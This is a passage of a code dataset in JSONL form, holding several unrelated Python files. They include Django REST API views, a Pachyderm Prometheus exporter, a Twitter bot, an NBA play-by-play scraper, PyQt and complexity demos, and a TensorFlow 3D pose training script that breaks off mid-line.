self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def perform_create(self, serializer):\n instance = serializer.save()\n bridge = set(self.request.data[\"can_see\"])\n for obj_id in bridge:\n Bridge.objects.create(object_id=obj_id, transit=instance)\n create_circuit_transit(instance)\n\n\nclass RetrieveUpdateDelete(RetrieveUpdateDestroyAPIView):\n queryset = Transit.objects.all()\n lookup_field = \"pk\"\n serializer_class = TransitCreateSerializer\n permission_classes = (IsAuthenticated, IsPervichkaOnly | SuperUser, IngenerUser | SuperUser)\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = TransitDetailSerializer(instance)\n return Response(serializer.data)\n\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n prev_trassa = set(instance.trassa.all())\n new_trassa = set(Object.objects.get(id=pk) for pk in self.request.data[\"trassa\"])\n deleted_object = prev_trassa - new_trassa\n\n if self.request.data[\"create_circuit_transit\"]:\n if not check_circuit_transit(deleted_object):\n return Response({\n \"detail\": \"Subordinate circuits belong to routes that extend beyond the transit being dismantled.\"},\n status=status.HTTP_403_FORBIDDEN)\n\n if not check_circuit_transit(new_trassa):\n return Response({\"detail\": \"Transit cannot be set up: a terminal object of the route already takes part in a transit\"},\n status=status.HTTP_403_FORBIDDEN)\n added_object = new_trassa - prev_trassa\n
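# As in create() above: for every object newly added to the route, any bridge\n# transit still flagged create_circuit_transit is demoted, so at most one\n# transit per object keeps driving automatic circuit-transit creation (this\n# reading of the surrounding code is an assumption, not a documented rule).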
\n for obj in added_object:\n for bridge in obj.bridges.filter(transit__create_circuit_transit=True):\n bridge.transit.create_circuit_transit = False\n bridge.transit.save()\n\n trassa = serializer.save()\n trassa.can_see.all().delete()\n bridge = self.request.data[\"can_see\"]\n\n for obj_id in bridge:\n Bridge.objects.create(object_id=obj_id, transit=trassa)\n\n if self.request.data[\"create_circuit_transit\"]:\n create_circuit_transit(trassa)\n for deleted_object in prev_trassa - set(trassa.trassa.all()):\n\n for circuit in deleted_object.circuit_object_parent.all():\n if not circuit.trassa or circuit.trassa.obj_trassa == instance:\n circuit_transit = CircuitTransit.objects.create()\n circuit_transit.trassa.add(circuit)\n circuit.trassa = circuit_transit\n circuit.is_modified = False\n circuit.save()\n\n if getattr(instance, '_prefetched_objects_cache', None):\n # If 'prefetch_related' has been applied to a queryset, we need to\n # forcibly invalidate the prefetch cache on the instance.\n instance._prefetched_objects_cache = {}\n\n return Response(serializer.data)\n\n def perform_destroy(self, instance):\n if instance.create_circuit_transit:\n if not check_circuit_transit(instance.trassa.all()):\n return Response({\"detail\": \"Cannot delete: the objects take part in a transit\"},\n status=status.HTTP_403_FORBIDDEN)\n\n for obj in instance.trassa.all().iterator():\n\n for circuit in obj.circuit_object_parent.all():\n if not circuit.trassa or circuit.trassa.obj_trassa == instance:\n circuit_transit = CircuitTransit.objects.create()\n circuit_transit.trassa.add(circuit)\n circuit.trassa = circuit_transit\n circuit.is_modified = False\n circuit.save()\n instance.delete()\n\n\nclass TransitListAPIView(APIView):\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, pk):\n obj = get_object_or_404(Object, pk=pk)\n serializer = BridgeListSerializer(obj.bridges.all(), many=True)\n return Response(serializer.data)\n","repo_name":"ainurabek/ouss","sub_path":"apps/opu/objects/trassa.py","file_name":"trassa.py","file_ext":"py","file_size_in_byte":9441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13511203858","text":"import argparse\nfrom prometheus_client import start_http_server, Gauge\nimport time\nimport python_pachyderm\n\ngauges = dict()\nsuccescounters = dict()\nfailcounters = dict()\n\n\ndef update_gauges(client):\n global gauges\n pipelines = client.list_pipeline().pipeline_info\n for pipeline in pipelines:\n name = str(pipeline.pipeline.name).replace(\"-\", \"_\")\n if name in gauges:\n print(\"{} updated\".format(name))\n gauges[name].set(pipeline.last_job_state)\n # if pipeline.job_counts[3] > succescounters[name]:\n # gauges[name].set(0)\n # succescounters[name] = pipeline.job_counts[3]\n # if pipeline.job_counts[2] > failcounters[name]:\n # gauges[name].set(1)\n # succescounters[name] = pipeline.job_counts[2]\n\n\ndef main():\n global gauges\n args = parse_args()\n port = args.port\n host = args.host\n\n pachyclient = python_pachyderm.Client().new_from_pachd_address(\"{}:{}\".format(host, port))\n start_http_server(port=9426)\n pipelines = pachyclient.list_pipeline().pipeline_info\n for pipeline in pipelines:\n name = str(pipeline.pipeline.name).replace(\"-\", \"_\")\n\n last_job_state = pipeline.last_job_state\n g = Gauge(\"{}_last_job\".format(name),\n \"Last Job status of pipeline {}\".format(name))\n gauges[name] = g\n succescounters[name] = pipeline.job_counts[3]\n failcounters[name] = 
pipeline.job_counts[2]\n while True:\n update_gauges(pachyclient)\n time.sleep(60)\n\n\ndef parse_args(args=None):\n parser = argparse.ArgumentParser(description='Prometheus exporter for PachyDerm metrics')\n parser.add_argument(\"-i\", \"--host\", type=str, default=\"pachd\", help=\"Host of pachd\")\n parser.add_argument(\"-p\", \"--port\", type=int, default=30650,\n help=\"port number\")\n\n return parser.parse_args(args=args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DjankoSkalidge/pychyderm-exporter","sub_path":"src/pychyderm-exporter.py","file_name":"pychyderm-exporter.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10736178244","text":"import tweepy\nimport json\nfrom pprint import pprint\nfrom time import sleep\nfrom pyshorteners import Shortener\nfrom credentials import *\nimport datetime\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\nshortener = Shortener('Isgd')\n\nwith open('punten.json') as data_file:\n data = json.load(data_file)\n\ncount_read = open(\"count.txt\", \"r\")\ncount = int(count_read.read())\ncount_read.close()\n\nnow = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n\ndef update_status():\n if count < len(data):\n item = data[count]\n text = item[\"tekst\"][:115]\n base_long_url = 'https://programma.gl/'\n slug = item[\"slug\"]\n long_url = base_long_url + slug\n short_url = shortener.short(long_url)\n tweet = text + '…—' + short_url\n try:\n api.update_status(tweet)\n new_count = count + 1\n count_write = open(\"count.txt\", \"w\")\n count_write.truncate()\n count_write.write(str(new_count))\n count_write.close()\n log_write = open(\"log.txt\", \"w\")\n log_write.write(str(now + ' - ' + tweet))\n log_write.close()\n except tweepy.TweepError as e:\n log_write = open(\"log.txt\", \"w\")\n log_write.write(str(now + ' - ' + e.reason))\n log_write.close()\n\nupdate_status()\n","repo_name":"programmaGL/glbot","sub_path":"glbot.py","file_name":"glbot.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1384664866","text":"from gazpacho import get, Soup\nimport time\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport re\nimport datetime as DT\n\ndef get_pbp_links(url):\n html = get(url)\n soup = Soup(html)\n data = soup.find('td', {'data-stat': 'date_game'})\n links = [l.find('a') for l in data]\n pbp_links = [\"https://www.basketball-reference.com\" + l.attrs['href'].replace('scores/','scores/pbp/') for l in links]\n return pbp_links\n\ndef get_table_data(url):\n html = get(url)\n soup = Soup(html)\n table = soup.find('table', {'id': 'pbp'})\n table_data = table.find('td', {'class': 'center'})\n scores = [t.text for t in table_data]\n rows = table.find('tr',strict=True)\n times = []\n for i in rows:\n try:\n time = i.find('td', mode='first')\n times.append(time.text)\n except (IndexError, TypeError) as e:\n pass\n return scores, times\n\ndef time_played(times,scores):\n q1 = DT.datetime(1900,1,1,0,12)\n q2 = DT.datetime(1900,1,1,0,24)\n q3 = DT.datetime(1900,1,1,0,36)\n q4 = DT.datetime(1900,1,1,0,48)\n ot1 = DT.datetime(1900,1,1,0,53)\n ot2 = DT.datetime(1900,1,1,0,58)\n ot3 = DT.datetime(1900,1,1,1,3)\n ot4 = DT.datetime(1900,1,1,1,8)\n ot5 = DT.datetime(1900,1,1,1,13)\n\n second_quart_counter = 0\n third_quart_counter = 
0\n fourth_quart_counter = 0\n ot_counter = 0\n time_played = []\n\n for t,s in zip(times,scores):\n t = DT.datetime.strptime(t, '%M:%S')\n if 'Start of 2nd quarter' in s:\n second_quart_counter += 1\n elif 'Start of 3rd quarter' in s:\n third_quart_counter += 1\n elif 'Start of 4th quarter' in s:\n fourth_quart_counter += 1\n elif ('Start' in s) & ('overtime' in s):\n ot_counter += 1\n elif 'End of 2nd quarter' in s:\n second_quart_counter -= 1\n elif 'End of 3rd quarter' in s:\n third_quart_counter -= 1\n elif 'End of 4th quarter' in s:\n fourth_quart_counter -= 1\n\n if second_quart_counter == 1:\n t = (q2-t).total_seconds()/60\n time_played.append(t)\n elif third_quart_counter == 1:\n t = (q3-t).total_seconds()/60\n time_played.append(t)\n elif fourth_quart_counter == 1:\n t = (q4-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 1:\n t = (ot1-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 2:\n t = (ot2-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 3:\n t = (ot3-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 4:\n t = (ot4-t).total_seconds()/60\n time_played.append(t)\n elif ot_counter == 5:\n t = (ot5-t).total_seconds()/60\n time_played.append(t)\n else:\n t = (q1-t).total_seconds()/60\n time_played.append(t)\n return time_played\n\ndef strip_score(score):\n home = []\n away = []\n for s in score:\n h = re.findall(r'[0-9]{1,3}$',s)[0]\n a = re.findall(r'^[0-9]{1,3}',s)[0]\n home.append(h)\n away.append(a)\n return home, away\n\ndef get_data(url):\n scores, times = get_table_data(url)\n\n df = pd.DataFrame({\n 'time': times,\n 'score': scores\n })\n\n df['time'] = df['time'].apply(lambda x:re.findall(r'[0-9]{1,2}:[0-9]{2}',x)[0])\n\n df['time'] = time_played(df['time'],df['score'])\n\n #remove duplicates\n df.drop_duplicates(inplace=True)\n\n # remove indicator of start/end of quarter\n df = df[df['score'].str.contains('-')]\n\n home, away = strip_score(df['score'])\n df['home'] = home\n df['away'] = away\n\n df.drop('score',axis=1,inplace=True)\n df['home'] = df['home'].astype(int)\n df['away'] = df['away'].astype(int)\n\n home_win = df['home'].iloc[-1] > df['away'].iloc[-1]\n df['home_win'] = [home_win] * len(df['home'])\n\n return df\n\n# Base url for season 2017-2018\nseason_17_18_base_url = \"https://www.basketball-reference.com/play-index/tgl_finder.cgi?request=1&match=game&lg_id=NBA&team_seed_cmp=eq&opp_seed_cmp=eq&year_min=2018&year_max=2018&is_range=N&game_num_type=team&order_by=date_game\"\n# Base url for season 2018-2019\nseason_18_19_base_url = \"https://www.basketball-reference.com/play-index/tgl_finder.cgi?request=1&match=game&lg_id=NBA&team_seed_cmp=eq&opp_seed_cmp=eq&year_min=2019&year_max=2019&is_range=N&game_num_type=team&order_by=date_game\"\n\n# Get 2017-2018 season game links\n# New list to store links to play by play data\npbp_links_17_18 = get_pbp_links(season_17_18_base_url)\n\n# loop through season 17_18 games and save play by play(pbp) game urls into season_17_18_url\n# change url offset\nfor _ in tqdm(range(100, 2624, 100)):\n offset = _\n season_17_18_url = 
f\"https://www.basketball-reference.com/play-index/tgl_finder.cgi?request=1&player=&match=game&lg_id=NBA&year_min=2018&year_max=2018&team_id=&opp_id=&is_range=N&is_playoffs=&round_id=&best_of=&team_seed=&opp_seed=&team_seed_cmp=eq&opp_seed_cmp=eq&game_num_type=team&game_num_min=&game_num_max=&game_month=&game_location=&game_result=&is_overtime=&c1stat=&c1comp=&c1val=&c2stat=&c2comp=&c2val=&c3stat=&c3comp=&c3val=&c4stat=&c4comp=&c4val=&order_by=date_game&order_by_asc=&offset={offset}\"\n links = get_pbp_links(season_17_18_url)\n pbp_links_17_18.extend(links)\n time.sleep(1)\n\npbp_links_17_18 = np.unique(pbp_links_17_18)\n\n# Get 2018-2019 season game links\npbp_links_18_19 = get_pbp_links(season_18_19_base_url)\n\n# loop through season 18_19 games\n# change url offset\nfor _ in tqdm(range(100, 2624, 100)):\n offset = _\n season_18_19_url = f\"https://www.basketball-reference.com/play-index/tgl_finder.cgi?request=1&player=&match=game&lg_id=NBA&year_min=2019&year_max=2019&team_id=&opp_id=&is_range=N&is_playoffs=&round_id=&best_of=&team_seed=&opp_seed=&team_seed_cmp=eq&opp_seed_cmp=eq&game_num_type=team&game_num_min=&game_num_max=&game_month=&game_location=&game_result=&is_overtime=&c1stat=&c1comp=&c1val=&c2stat=&c2comp=&c2val=&c3stat=&c3comp=&c3val=&c4stat=&c4comp=&c4val=&order_by=date_game&order_by_asc=&offset={offset}\"\n links = get_pbp_links(season_18_19_url)\n pbp_links_18_19.extend(links)\n time.sleep(1)\n\npbp_links_18_19 = np.unique(pbp_links_18_19)\n\n# Define table for 17-18 data\ndf_17_18 = pd.DataFrame({\n 'time':[] ,\n 'home':[] ,\n 'away':[],\n 'home_win':[]\n})\n\n\n# Loop through the links in 17-18 season games and add all data into df_17_18\nfor l in tqdm(pbp_links_17_18):\n try:\n data = get_data(l)\n df_17_18 = df_17_18.append(data)\n time.sleep(1)\n except ValueError:\n pass\n\n# Define table for 18-19 data\ndf_18_19 = pd.DataFrame({\n 'time': [],\n 'home': [],\n 'away': [],\n 'home_win':[]\n})\n\n# Loop through the links in 18-19 season games and add all data into df_18_19\nfor l in tqdm(pbp_links_18_19):\n try:\n data = get_data(l)\n df_18_19 = df_18_19.append(data)\n time.sleep(1)\n except ValueError:\n pass\n\n# Export 17-18 season game data to csv\ndf_17_18.to_csv('/home/nthock/Documents/capstone/data/season_17_18.csv', index=False)\n\n# Export 18-19 season game data to to_csv\ndf_18_19.to_csv('/home/nthock/Documents/capstone/data/season_18_19.csv', index=False)\n","repo_name":"teckhockng/capstone","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":7331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71356047788","text":"def multiply_arrays(array1, array2):\n result = []\n number_of_iterations = 0\n\n for number1 in array1:\n print(f'Array 1: {number1}')\n for number2 in array2:\n print(f'Array 2: {number2}')\n result.append(number1 * number2)\n number_of_iterations += 1\n\n print(f'{number_of_iterations} iterações!')\n return result\n\n # sum_array(array_com_dois_mil_numeros)\n # O tempo de execução deste algoritmo foi 0.45s\n\n # sum_array(array_com_quatro_mil_numeros)\n # Já esse teve tempo de execução de 1.8s, cerca de quatro vezes maior.\n\n\nmeu_array = [1,2,3,4,5]\n\nmultiply_arrays(meu_array, meu_array)\n\n# para um algoritmo O(n²) , aumentar a entrada em n vezes, aumenta o tempo de execução em n² vezes!\n\n\"\"\" 25 iterações! 
\"\"\"","repo_name":"DiSerafim/trybe-exercises","sub_path":"ciencia-computacao/bloco_35-algoritimos/35.1-complexidade-de-algoritmos/complexidade-quadratica.py","file_name":"complexidade-quadratica.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25724511326","text":"# PyQt progressbar\n\n# Example : QProgressBar ()\n\n\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nclass ProgressBar(QWidget): # child class\n\n def __init__(self): # child class constructor\n super().__init__() # parent class constructor\n\n self.window() # function calling inside child class constructor\n\n def window(self): # function\n\n self.label = QLabel(\"ProgressBar\",self) # initializing QLable with name 'ProgressBar'\n self.label.move(140,80) # lable position\n self.label.setFont(QFont(\"Aerial\",12)) # lable font\n\n self.pbar = QProgressBar(self) # initializing QProgressBar()\n self.pbar.setGeometry(100,120,250,25) # pbar position and size\n\n self.button = QPushButton(\"Start\",self) # initializing QPushButton()\n self.button.move(160,160)\n self.button.clicked.connect(self.doAction) # when the the button se pressed doAction function is called\n\n self.timer = QBasicTimer() # initializing QBasicTimer() for time events\n self.step = 0 # initilaizing a variable step\n\n self.setGeometry(300,300,400,250) # main window position and size\n self.setWindowTitle(\"PyQt ProgressBar\") # main window title\n self.show() # showing all the windows\n\n def timerEvent(self,e): # timerEvent function from QBasicTimer for handling time event\n if self.step >= 100: # condition\n self.timer.stop() # stop timer\n self.button.setText('Finished') # changing button text\n return\n\n self.step = self.step + 1 # incrementing step variable\n self.pbar.setValue(self.step) # setting pbar value \n\n def doAction(self): # doAction function for handling button pressing\n if self.timer.isActive(): # condition\n self.timer.stop() # stop timer\n self.button.setText(\"Start\") # change button text\n else:\n self.timer.start(100,self) # start timer with 100 miliseconds\n self.button.setText(\"Stop\") # change button text\n\ndef main():\n app = QApplication(sys.argv)\n ProgressBar_Obj = ProgressBar()\n sys.exit(app.exec_())\n\nif __name__==\"__main__\":\n main()","repo_name":"ankit-0044/Python","sub_path":"Python Gui/10.01_QProgressBar.py","file_name":"10.01_QProgressBar.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1230030282","text":"# Exploratory Data Analysis\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndataset = pd.read_csv('structred_data.csv')\r\ndataset.head()\r\ndataset.columns\r\n\r\ndf = dataset.iloc[:, 1: ]\r\ndf.columns\r\n\r\n# removing duplicate data\r\n\r\ncountry= df['Country_Name'].value_counts()\r\nregion= df['Region'].value_counts()\r\ncity= df['City'].value_counts()\r\n\r\ndf.describe()\r\ndf.dtypes\r\n\r\nfrom datetime import datetime,time\r\n\r\ndate= []\r\ntime= []\r\nfor i in range(0, 127826):\r\n a=i\r\n aa = df.timestamp[i][0:10]\r\n date.append(aa)\r\n ab = df.timestamp[i][11:-1]\r\n time.append(ab)\r\n\r\ndate.append(df.timestamp[125825][0:10])\r\ntime.append(df.timestamp[125825][11:-1])\r\n\r\n# Creating a Date column to store the actual Date format for the given Month column\r\ndf[\"Date\"] = 
date\r\ndf[\"time\"] = time\r\n\r\n\r\ndf[\"Date\"]= pd.to_datetime(df.Date)\r\ndf[\"time\"]= pd.to_datetime(df.time)\r\n\r\n\r\n\r\ndf[\"Date1\"] = pd.to_datetime(df.Date,format=\"%b-%y\")\r\n\r\n# Extracting Day, weekday name, month name, year from the Date column using \r\n# Date functions from pandas \r\n\r\ndf[\"month\"] = df.Date1.dt.strftime(\"%b\") # month extraction\r\ndf[\"Day\"] = df.Date1.dt.strftime(\"%d\") # Day extraction\r\ndf[\"wkday\"] = df.Date1.dt.strftime(\"%A\") # weekday extraction\r\ndf[\"year\"] = df.Date1.dt.strftime(\"%Y\") # year extraction\r\n\r\ndf.columns\r\n\r\nnew_df= df[['Date', 'time', 'Date1', 'month','Day', 'wkday', 'year', 'Unread','IP', \r\n 'Country_Code','Country_Name', 'Region', 'City','User_Agent', \r\n 'Platform', 'Browser']]\r\n\r\nnew_df.to_csv('cleaned_structred_data.csv')\r\n","repo_name":"amitdivekar30/-Topic-Mining-Exploratory-Analysis","sub_path":"EDA_structred_Data.py","file_name":"EDA_structred_Data.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28894746173","text":"from django.forms import model_to_dict\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework.response import Response\nfrom .models import Movie\nfrom .serializer import MovieSerializer, MovieOrderSerializer\nfrom rest_framework.pagination import PageNumberPagination\nfrom users.permissions import IsAdminAccount\nimport ipdb\n\n\n# Create your views here.\nclass MoviesView(APIView, PageNumberPagination):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticatedOrReadOnly, IsAdminAccount]\n\n def get(self, req):\n movies = Movie.objects.all()\n pages = self.paginate_queryset(movies, req)\n serializer = MovieSerializer(pages, many=True)\n return self.get_paginated_response(serializer.data)\n\n def post(self, req):\n self.check_object_permissions(req, obj=None)\n serializer = MovieSerializer(data=req.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(user=req.user)\n return Response(serializer.data, 201)\n\n\nclass MoviesDetailsView(APIView):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticatedOrReadOnly, IsAdminAccount]\n\n def get(self, req, movie_id):\n self.check_object_permissions(req, obj=None)\n movie = get_object_or_404(Movie, id=movie_id)\n serializer = MovieSerializer(movie)\n return Response(serializer.data, 200)\n\n def delete(self, req, movie_id):\n self.check_object_permissions(req, obj=None)\n movie = get_object_or_404(Movie, id=movie_id)\n movie.delete()\n return Response(status=204)\n\n\nclass MoviesOrderView(APIView):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n def post(self, req, movie_id):\n movie_find = get_object_or_404(Movie, id=movie_id)\n serializer = MovieOrderSerializer(data=req.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(movie=movie_find, user=req.user)\n return Response(serializer.data, 201)\n","repo_name":"AlexsonPereira/Filmes_API_Python","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"72948898987","text":"\n\"\"\"Predicting 3d poses from 2d joints\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport os\nimport random\nimport sys\nimport time\nimport h5py\nimport copy\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\nimport procrustes\n\nimport viz\nimport cameras\nimport data_utils\nimport linear_model\nimport csv\nimport os, glob, json, tqdm\nimport numpy as np\nimport pandas as pd\n\n\ntf.app.flags.DEFINE_float(\"learning_rate\", 1e-3, \"Learning rate\")\ntf.app.flags.DEFINE_float(\"dropout\", 0.5, \"Dropout keep probability. 1 means no dropout\")\ntf.app.flags.DEFINE_integer(\"batch_size\", 36000, \"Batch size to use during training\")\ntf.app.flags.DEFINE_integer(\"epochs\", 7200, \"How many epochs we should train for\")\ntf.app.flags.DEFINE_integer(\"period_epoch_eval\", 5, \"Epoch period for evaluation and save\")\ntf.app.flags.DEFINE_boolean(\"max_norm\", True , \"Apply maxnorm constraint to the weights\")\ntf.app.flags.DEFINE_boolean(\"batch_norm\", True, \"Use batch_normalization\")\ntf.app.flags.DEFINE_boolean(\"centering_2d\", True , \"Use centering 2d around root\")\ntf.app.flags.DEFINE_string(\"optimizer\", \"Adam\", \"Optimizer to use\") # SGD / Adam\ntf.app.flags.DEFINE_integer(\"idx_split\", -1, \"index for splitubg train_val list\") # -1 ~ 7 -1: original split 0~7: newly added split\n\n# Data loading\ntf.app.flags.DEFINE_boolean(\"predict_14\", False, \"predict 14 joints\")\ntf.app.flags.DEFINE_string(\"action\",\"All\", \"The action to train on. 'All' means all the actions\")\n\n# Architecture\ntf.app.flags.DEFINE_integer(\"linear_size\", 1024, \"Size of each model layer.\")\ntf.app.flags.DEFINE_integer(\"num_layers\", 4, \"Number of layers in the model.\")\ntf.app.flags.DEFINE_boolean(\"residual\", True, \"Whether to add a residual connection every 2 layers\")\n\n# Evaluation\ntf.app.flags.DEFINE_boolean(\"for_submission\", False, \"Whether to use Test(true) or Val(not)\")\ntf.app.flags.DEFINE_boolean(\"procrustes\", True, \"Apply procrustes analysis at test time\")\ntf.app.flags.DEFINE_boolean(\"evaluateActionWise\",False, \"The dataset to use either h36m or heva\")\n\n# Directories\ntf.app.flags.DEFINE_string(\"cameras_path\",\"data/h36m/cameras.h5\",\"Directory to load camera parameters\")\ntf.app.flags.DEFINE_string(\"data_dir\", \"data/h36m_eccv18_challenge/\", \"Data directory\") #data/h36m_muzi data/h36m_eccv18_challenge/\ntf.app.flags.DEFINE_string(\"detector_2d\", \"cpm\", \"2D pose detector name\") #GT_pose_2d cpm\ntf.app.flags.DEFINE_string(\"train_dir\", \"experiments_eccv18\", \"Training directory.\")\ntf.app.flags.DEFINE_string(\"prediction_dir\", \"eccv18_out\", \"3D prediction directory\")\n\n# Train or load\ntf.app.flags.DEFINE_string(\"mode\", 'eval', \"Experiment mode\") # train / eval / generate\ntf.app.flags.DEFINE_boolean(\"use_cpu\", False, \"Whether to use the CPU\")\ntf.app.flags.DEFINE_integer(\"load\", 4241, \"Try to load a previous checkpoint.\") #7800 2400\n\n\n\n# Misc\ntf.app.flags.DEFINE_boolean(\"use_fp16\", False, \"Train using fp16 instead of fp32.\")\n\nFLAGS = tf.app.flags.FLAGS\n\n\n\nFLAGS.prediction_dir = FLAGS.prediction_dir + \"_\" + str(FLAGS.idx_split)\n\n\ntrain_dir = os.path.join( FLAGS.train_dir,\n 'split_{0}'.format(FLAGS.idx_split),\n 'dropout_{0}'.format(FLAGS.dropout),\n 'epochs_{0}'.format(FLAGS.epochs) 
if FLAGS.epochs > 0 else '',\n 'lr_{0}'.format(FLAGS.learning_rate),\n 'residual' if FLAGS.residual else 'not_residual',\n 'depth_{0}'.format(FLAGS.num_layers),\n 'linear_size{0}'.format(FLAGS.linear_size),\n 'batch_size_{0}'.format(FLAGS.batch_size),\n 'procrustes' if FLAGS.procrustes else 'no_procrustes',\n 'maxnorm' if FLAGS.max_norm else 'no_maxnorm',\n 'batch_normalization' if FLAGS.batch_norm else 'no_batch_normalization',\n '{0}'.format(FLAGS.detector_2d),\n # 'predict_14' if FLAGS.predict_14 else 'predict_17',\n 'center_2d' if FLAGS.centering_2d else 'not_center_2d')\n\n\nprint (train_dir)\nsummaries_dir = os.path.join( train_dir, \"log\" ) # Directory for TB summaries\n\n# To avoid race conditions: https://github.com/tensorflow/tensorflow/issues/7448\nos.system('mkdir -p {}'.format(summaries_dir))\n\ndef create_model( session, actions, batch_size, centering_2d = False, optimizer = \"Adam\", for_eccv18 = False):\n \"\"\"\n Create model and initialize it or load its parameters in a session\n\n Args\n session: tensorflow session\n actions: list of string. Actions to train/test on\n batch_size: integer. Number of examples in each batch\n Returns\n model: The created (or loaded) model\n Raises\n ValueError if asked to load a model, but the checkpoint specified by\n FLAGS.load cannot be found.\n \"\"\"\n\n model = linear_model.LinearModel(\n FLAGS.linear_size,\n FLAGS.num_layers,\n FLAGS.residual,\n FLAGS.batch_norm,\n FLAGS.max_norm,\n batch_size,\n FLAGS.learning_rate,\n summaries_dir,\n FLAGS.predict_14,\n dtype=tf.float16 if FLAGS.use_fp16 else tf.float32,\n centering_2d = centering_2d,\n optimizer = optimizer,\n for_eccv18 = for_eccv18\n )\n\n if FLAGS.load <= 0:\n # Create a new model from scratch\n print(\"Creating model with fresh parameters.\")\n session.run( tf.global_variables_initializer() )\n return model\n\n # Load a previously saved model\n ckpt = tf.train.get_checkpoint_state( train_dir, latest_filename=\"checkpoint\")\n print( \"train_dir\", train_dir )\n\n if ckpt and ckpt.model_checkpoint_path:\n # Check if the specific checkpoint exists\n if FLAGS.load > 0:\n if os.path.isfile(os.path.join(train_dir,\"checkpoint-{0}.index\".format(FLAGS.load))):\n ckpt_name = os.path.join( os.path.join(train_dir,\"checkpoint-{0}\".format(FLAGS.load)) )\n else:\n raise ValueError(\"Asked to load checkpoint {0}, but it does not seem to exist\".format(FLAGS.load))\n else:\n ckpt_name = os.path.basename( ckpt.model_checkpoint_path )\n\n print(\"Loading model {0}\".format( ckpt_name))\n # model.saver.restore( session, ckpt.model_checkpoint_path ) # critical error\n model.saver.restore(session, ckpt_name) # critical error\n\n return model\n else:\n print(\"Could not find checkpoint. 
Aborting.\")\n raise( ValueError, \"Checkpoint {0} does not seem to exist\".format( ckpt.model_checkpoint_path ) )\n\n return model\n\n\n\ndef train_eccv18():\n \"\"\"Train a linear model for 3d pose estimation\"\"\"\n\n actions = data_utils.define_actions( FLAGS.action )\n\n\n # Load 3d data\n train_set_3d, test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=3)\n\n\n train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=2)\n\n # Avoid using the GPU if requested\n\n device_count = {\"GPU\": 0} if FLAGS.use_cpu else {\"GPU\": 1}\n with tf.Session(config=tf.ConfigProto(\n device_count=device_count,\n allow_soft_placement=True)) as sess:\n\n print(\"\\n**********************************device_count**********************************\\ndevice_count\\n\\n\\n\")\n # === Create the model ===\n print(\"Creating %d bi-layers of %d units.\" % (FLAGS.num_layers, FLAGS.linear_size))\n model = create_model( sess, actions, FLAGS.batch_size, FLAGS.centering_2d, FLAGS.optimizer, for_eccv18=True)\n model.train_writer.add_graph( sess.graph )\n print(\"Model (%d step) created\" %FLAGS.load)\n\n #=== This is the training loop ===\n step_time, loss, val_loss = 0.0, 0.0, 0.0\n current_step = 0 if FLAGS.load <= 0 else FLAGS.load + 1\n previous_losses = []\n\n step_time, loss = 0, 0\n current_epoch = 0\n log_every_n_batches = 2\n\n for i_epoch in xrange( FLAGS.epochs ):\n current_epoch = current_epoch + 1\n\n # === Load training batches for one epoch ===\n encoder_inputs, decoder_outputs = 